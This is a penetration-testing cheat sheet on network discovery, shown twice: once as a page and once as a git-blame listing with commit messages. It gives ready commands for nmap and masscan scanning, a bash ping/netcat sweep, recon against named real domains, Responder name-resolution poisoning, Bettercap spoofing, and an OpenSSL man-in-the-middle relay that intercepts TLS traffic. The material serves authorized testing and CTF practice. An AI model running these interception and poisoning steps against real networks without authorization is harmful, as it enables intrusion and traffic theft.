PayloadsAllTheThings/Methodology and Resources/Network Discovery.md

# Network Discovery

## Summary

- [Nmap](#nmap)
- [Network Scan with nc and ping](#network-scan-with-nc-and-ping)
- [Spyse](#spyse)
- [Masscan](#masscan)
- [Netdiscover](#netdiscover)
- [Responder](#responder)
- [Bettercap](#bettercap)
- [Reconnoitre](#reconnoitre)
- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl)
- [References](#references)

## Nmap

* Ping sweep (No port scan, No DNS resolution)

```powershell
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
-sn : Disable port scanning. Host discovery only.
-n : Never do DNS resolution
```

* Basic NMAP

```bash
sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv

• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports
• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)
• 192.168.0.1 is the IP address to scan
• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"
• -iL INPUTFILE tells Nmap to use the provided file as inputs
```

* CTF NMAP

This configuration is enough to do a basic check for a CTF VM

```bash
nmap -sV -sC -oA ~/nmap-initial 192.168.1.1

-sV : Probe open ports to determine service/version info
-sC : to enable the script
-oA : to save the results

After this quick command you can add "-p-" to run a full scan while you work with the previous result
```

* Aggressive NMAP

```bash
nmap -A -T4 scanme.nmap.org
• -A: Enable OS detection, version detection, script scanning, and traceroute
• -T4: Defines the timing for the task (options are 0-5 and higher is faster)
```

* Using searchsploit to detect vulnerable services

```bash
nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml
```

* Generating nice scan report

```bash
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
```

* NMAP Scripts

```bash
nmap -sC : equivalent to --script=default

nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /phpmyadmin/: phpMyAdmin
|   /.git/HEAD: Git folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'

nmap --script smb-enum-users.nse -p 445 [target host]
Host script results:
| smb-enum-users:
|   METASPLOITABLE\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   METASPLOITABLE\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   METASPLOITABLE\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account

List Nmap scripts : ls /usr/share/nmap/scripts/
```

## Network Scan with nc and ping

Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
To check if hosts are up on a /24 range
```bash
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
```
To check which ports are open on a specific host
```bash
for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done
```
Both at the same time on a /24 range
```bash
for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
```
Not in one-liner version:
```bash
for i in `seq 1 255`; 
do 
    ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; 
    if [ $? -eq 0 ]; 
    then 
        echo "192.168.1.$i is UP:"; 
        for j in {21,22,80,139,443,445,3306,3389,8080,8443}; 
        do 
            nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; 
            if [ $? -eq 0 ]; 
            then 
                echo "\t192.168.1.$i has port $j open"; 
            fi ; 
        done ; 
    fi ; 
done
```


## Spyse
* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)

* [Spyse Wrapper](https://github.com/zeropwn/spyse.py)

#### Searching for subdomains
```bash
spyse -target xbox.com --subdomains
```

#### Reverse IP Lookup
```bash
spyse -target 52.14.144.171 --domains-on-ip
```

#### Searching for SSL certificates
```bash
spyse -target hotmail.com --ssl-certificates
```
```bash
spyse -target "org: Microsoft" --ssl-certificates
```
#### Getting all DNS records
```bash
spyse -target xbox.com --dns-all
```

## Masscan

```powershell
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000

# find machines on the network
sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst

# find open ports for one machine
sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst


# TCP grab banners and services information
TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP

# UDP grab banners and services information
UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
```

## Reconnoitre

Dependencies:

* nbtscan
* nmap

```powershell
python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick
```

If you have a segfault with nbtscan, read the following quote.
> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255

## Netdiscover

```powershell
netdiscover -i eth0 -r 192.168.1.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
_____________________________________________________________________________
IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
```

## Responder

```powershell
responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
responder.py -I eth0 -wrf
```

Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)

## Bettercap

```powershell
bettercap -X --proxy --proxy-https -T <target IP>
# better cap in spoofing, discovery, sniffer
# intercepting http and https requests,
# targetting specific IP only
```

## SSL MITM with OpenSSL
This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.
If you can modify `/etc/hosts` of the client:
```powershell
sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts  # On client host
```
On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):
```powershell
openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem
```
On our MITM server, we setup our infra:
```powershell
mkfifo response
sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response | tee | openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] | tee | cat > response
```
In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.

## References

* [TODO](TODO)
Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00			`# Network Discovery`

Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`## Summary`
Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`- [Nmap](#nmap)`
Add network scan with pure bash 2023-04-20 13:21:48 +00:00			`- [Network Scan with nc and ping](#network-scan-with-nc-and-ping)`
Add Spyse to network discovery 1. spyse itself 2. python wrapper - using only a part of the available functionality of spyse, but will be updated very soon. 2019-09-30 11:26:26 +00:00			`- [Spyse](#spyse)`
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`- [Masscan](#masscan)`
			`- [Netdiscover](#netdiscover)`
			`- [Responder](#responder)`
			`- [Bettercap](#bettercap)`
			`- [Reconnoitre](#reconnoitre)`
Add SSL MITM using OpenSSL 2023-01-19 15:33:11 +00:00			`- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl)`
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`- [References](#references)`
Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00
			`## Nmap`

			`* Ping sweep (No port scan, No DNS resolution)`

			```powershell
			`nmap -sn -n --disable-arp-ping 192.168.1.1-254 \| grep -v "host down"`
Architecture - Files/Intruder/Images and README + template 2018-12-22 23:45:45 +00:00			`-sn : Disable port scanning. Host discovery only.`
			`-n : Never do DNS resolution`
Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00			```

			`* Basic NMAP`

			```bash
			`sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4`
			`sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv`

			`• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports`
			`• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000)`
			`• 192.168.0.1 is the IP address to scan`
			`• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE"`
			`• -iL INPUTFILE tells Nmap to use the provided file as inputs`
			```

			`* CTF NMAP`

			`This configuration is enough to do a basic check for a CTF VM`

			```bash
			`nmap -sV -sC -oA ~/nmap-initial 192.168.1.1`

			`-sV : Probe open ports to determine service/version info`
			`-sC : to enable the script`
			`-oA : to save the results`

			`After this quick command you can add "-p-" to run a full scan while you work with the previous result`
			```

			`* Aggressive NMAP`

			```bash
			`nmap -A -T4 scanme.nmap.org`
			`• -A: Enable OS detection, version detection, script scanning, and traceroute`
			`• -T4: Defines the timing for the task (options are 0-5 and higher is faster)`
			```

			`* Using searchsploit to detect vulnerable services`

			```bash
			`nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml`
			```

			`* Generating nice scan report`

			```bash
			nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
			```

			`* NMAP Scripts`

			```bash
			`nmap -sC : equivalent to --script=default`

			`nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap`
			`PORT STATE SERVICE`
			`80/tcp open http`
			`\| http-enum:`
			`\| /phpmyadmin/: phpMyAdmin`
			`\| /.git/HEAD: Git folder`
			`\| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'`
			`\|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'`

			`nmap --script smb-enum-users.nse -p 445 [target host]`
			`Host script results:`
			`\| smb-enum-users:`
			`\| METASPLOITABLE\backup (RID: 1068)`
			`\| Full name: backup`
			`\| Flags: Account disabled, Normal user account`
			`\| METASPLOITABLE\bin (RID: 1004)`
			`\| Full name: bin`
			`\| Flags: Account disabled, Normal user account`
			`\| METASPLOITABLE\msfadmin (RID: 3000)`
			`\| Full name: msfadmin,,,`
			`\| Flags: Normal user account`

			`List Nmap scripts : ls /usr/share/nmap/scripts/`
			```

Add network scan with pure bash 2023-04-20 13:21:48 +00:00			`## Network Scan with nc and ping`

			Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
			`To check if hosts are up on a /24 range`
			```bash
			for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
			```
			`To check which ports are open on a specific host`
			```bash
			`for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done`
			```
			`Both at the same time on a /24 range`
			```bash
			for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
			```
			`Not in one-liner version:`
			```bash
			for i in `seq 1 255`;
			`do`
			`ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1;`
			`if [ $? -eq 0 ];`
			`then`
			`echo "192.168.1.$i is UP:";`
			`for j in {21,22,80,139,443,445,3306,3389,8080,8443};`
			`do`
			`nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1;`
			`if [ $? -eq 0 ];`
			`then`
			`echo "\t192.168.1.$i has port $j open";`
			`fi ;`
			`done ;`
			`fi ;`
			`done`
			```


Add Spyse to network discovery 1. spyse itself 2. python wrapper - using only a part of the available functionality of spyse, but will be updated very soon. 2019-09-30 11:26:26 +00:00			`## Spyse`
			`* Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)`

			`* [Spyse Wrapper](https://github.com/zeropwn/spyse.py)`

			`#### Searching for subdomains`
			```bash
			`spyse -target xbox.com --subdomains`
			```

			`#### Reverse IP Lookup`
			```bash
			`spyse -target 52.14.144.171 --domains-on-ip`
			```

			`#### Searching for SSL certificates`
			```bash
			`spyse -target hotmail.com --ssl-certificates`
			```
			```bash
			`spyse -target "org: Microsoft" --ssl-certificates`
			```
			`#### Getting all DNS records`
			```bash
			`spyse -target xbox.com --dns-all`
			```

Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`## Masscan`

			```powershell
			`masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out`
			`masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000`
MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00
Network Discovery - Masscan update 2019-08-28 23:08:26 +00:00			`# find machines on the network`
			`sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp`
			`cat masscan_machines.tmp \| grep open \| cut -d " " -f4 \| sort -u > masscan_machines.lst`

			`# find open ports for one machine`
			`sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst`


Fix(Docs): Correcting typos on the repo 2020-10-17 20:47:20 +00:00			`# TCP grab banners and services information`
Network Discovery - Masscan update 2019-08-28 23:08:26 +00:00			`TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst\| grep open \| grep tcp \| cut -d " " -f3 \| tr '\n' ',' \| head -c -1)`
			`[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP`

Fix(Docs): Correcting typos on the repo 2020-10-17 20:47:20 +00:00			`# UDP grab banners and services information`
Network Discovery - Masscan update 2019-08-28 23:08:26 +00:00			`UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst\| grep open \| grep udp \| cut -d " " -f3 \| tr '\n' ',' \| head -c -1)`
			`[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP`
Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			```

Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00			`## Reconnoitre`

			`Dependencies:`

			`* nbtscan`
			`* nmap`

			```powershell
			`python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostnames --services --quick`
			```

			`If you have a segfault with nbtscan, read the following quote.`
			`> Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255`

Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp 2019-05-12 19:34:09 +00:00			`## Netdiscover`

			```powershell
			`netdiscover -i eth0 -r 192.168.1.0/24`
			`Currently scanning: Finished! \| Screen View: Unique Hosts`

			`20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876`
			`_____________________________________________________________________________`
			`IP At MAC Address Count Len MAC Vendor / Hostname`
			`-----------------------------------------------------------------------------`
			`192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom`
			`192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor`
			`192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc.`
			`192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD`
			```

			`## Responder`

			```powershell
			`responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.`
			`responder.py -I eth0 -wrf`
			```

			`Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)`

			`## Bettercap`

			```powershell
			`bettercap -X --proxy --proxy-https -T <target IP>`
			`# better cap in spoofing, discovery, sniffer`
			`# intercepting http and https requests,`
			`# targetting specific IP only`
			```

Add SSL MITM using OpenSSL 2023-01-19 15:33:11 +00:00			`## SSL MITM with OpenSSL`
			`This code snippet allows you to sniff/modify SSL traffic if there is a MITM vulnerability using only openssl.`
			If you can modify `/etc/hosts` of the client:
			```powershell
			`sudo echo "[OPENSSL SERVER ADDRESS] [domain.of.server.to.mitm]" >> /etc/hosts # On client host`
			```
			`On our MITM server, if the client accepts self signed certificates (you can use a legit certificate if you have the private key of the legit server):`
			```powershell
			`openssl req -subj '/CN=[domain.of.server.to.mitm]' -batch -new -x509 -days 365 -nodes -out server.pem -keyout server.pem`
			```
			`On our MITM server, we setup our infra:`
			```powershell
			`mkfifo response`
			`sudo openssl s_server -cert server.pem -accept [INTERFACE TO LISTEN TO]:[PORT] -quiet < response \| tee \| openssl s_client -quiet -servername [domain.of.server.to.mitm] -connect[IP of server to MITM]:[PORT] \| tee \| cat > response`
			```
			In this example, traffic is only displayed with `tee` but we could modify it using `sed` for example.

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Network Discovery and Subdomains enumerations 2018-10-02 14:17:16 +00:00
Add Spyse to network discovery 1. spyse itself 2. python wrapper - using only a part of the available functionality of spyse, but will be updated very soon. 2019-09-30 11:26:26 +00:00			`* [TODO](TODO)`